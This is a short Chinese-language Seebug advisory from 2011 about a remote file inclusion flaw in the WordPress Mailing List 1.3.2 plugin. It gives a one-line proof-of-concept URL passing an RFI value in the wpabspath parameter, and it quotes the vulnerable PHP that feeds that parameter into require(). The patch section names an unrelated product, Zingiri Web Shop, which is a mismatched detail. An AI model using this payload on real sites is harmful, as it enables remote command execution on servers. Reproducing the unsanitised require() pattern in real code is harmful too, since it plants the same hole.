Wordpress Mailing List 1.3.2远程文件包含漏洞

2011-10-18T00:00:00
ID SSV:23112
Type seebug
Reporter Root
Modified 2011-10-18T00:00:00

Description

Wordpress Mailing List是基于开源电子邮件管理器phplist的邮寄目录插件。

Wordpress Mailing List 1.3.2在实现上存在远程文件包含漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。

WordPress Zingiri Web Shop 2.2.0 厂商补丁:

WordPress

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://wordpress.org/

                                        
                                            
                                                ---
PoC
---
http://SERVER/WP_PATH/wp-content/plugins/mailz/lists/config/config.php?wpabspath=RFI

---
Vulnerable Code
---
if ( isset($_GET['wpabspath']) ) {
    //zingiri
    //error_reporting(E_ALL & ~E_NOTICE);
    //ini_set('display_errors', '1');
    define('ABSPATH', dirname(__FILE__) . '/');
    require($_GET['wpabspath'].'wp-config.php');